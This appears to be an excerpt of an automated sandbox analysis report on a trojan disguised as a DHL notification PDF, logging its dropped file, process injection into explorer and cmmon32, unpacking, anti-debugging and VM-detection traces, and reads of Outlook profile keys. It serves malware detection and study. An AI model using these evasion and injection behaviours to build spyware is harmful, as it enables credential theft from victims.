          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AEDFCE
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: String function: 00A1B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: String function: 004019C0 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0041E533 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0041E5E3 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0041E663 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0041E713 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0041E52E NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0041E5DD NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A5B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A599D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A5A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A595F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A5AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A596D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A5A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A59770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A5A770 NtOpenThread,
          Source: DHL_Notification_pdf.exeReversingLabs: Detection: 53%
          Source: DHL_Notification_pdf.exeVirustotal: Detection: 46%
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeFile read: C:\Users\user\Desktop\DHL_Notification_pdf.exeJump to behavior
          Source: DHL_Notification_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DHL_Notification_pdf.exe C:\Users\user\Desktop\DHL_Notification_pdf.exe
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\ldndbi.exe "C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess created: C:\Users\user\AppData\Local\Temp\ldndbi.exe C:\Users\user~1\AppData\Local\Temp\ldndbi.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\ldndbi.exe "C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess created: C:\Users\user\AppData\Local\Temp\ldndbi.exe C:\Users\user~1\AppData\Local\Temp\ldndbi.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsw10F4.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/5@12/7
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCommand line argument: A
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: DHL_Notification_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: ldndbi.exe, 00000001.00000003.250768478.000000001A020000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000001.00000003.250473705.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ldndbi.exe, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeUnpacked PE file: 3.2.ldndbi.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_00410AA4 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0041B1FB push esi; iretd
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0040DAA5 push edi; retf
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0041B369 push es; retf
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00422C58 push dword ptr [057DC0C6h]; ret
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0041C4AA push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0041BDCE push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00401DF0 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00406F32 push C87026BFh; retf
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A6D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\ldndbi.exeJump to dropped file
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 3384Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A46A60 rdtscp
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeAPI coverage: 9.3 %
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_004089F8 FindFirstFileExW,
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000003.463061661.0000000007AFF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000002.517701971.0000000007B66000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
          Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.263500910.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1D
          Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
          Source: explorer.exe, 00000004.00000000.259895150.0000000005EF4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: cmmon32.exe, 00000005.00000002.509147113.0000000000ED9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`p
          Source: cmmon32.exe, 00000005.00000002.509147113.0000000000F1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.263500910.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
          Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}813
          Source: explorer.exe, 00000004.00000002.522931488.000000000F5CA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.461873362.000000000F5CA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllate
          Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000004.00000002.514828788.0000000005F12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_0040B0AF GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A46A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h]
